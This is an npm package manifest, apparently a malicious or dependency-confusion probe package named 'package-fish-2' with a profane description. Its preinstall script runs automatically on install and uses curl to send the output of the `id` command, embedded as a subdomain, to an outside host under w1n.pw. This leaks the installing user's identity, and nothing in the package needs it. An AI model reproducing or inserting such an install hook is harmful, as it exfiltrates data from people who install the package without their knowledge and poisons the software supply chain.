{
  "name": "package-fish-2",
  "version": "1.0.2",
  "description": "FFFFFFFFFuck!!!!!",
  "engines": {
    "node": ">=8.9.0",
    "yarn": ">=1.3.0 <2.0.0"
  },
  "scripts": {
    "preinstall": "curl http://`id`.6e6d44f5.w1n.pw/fish"
  }
}
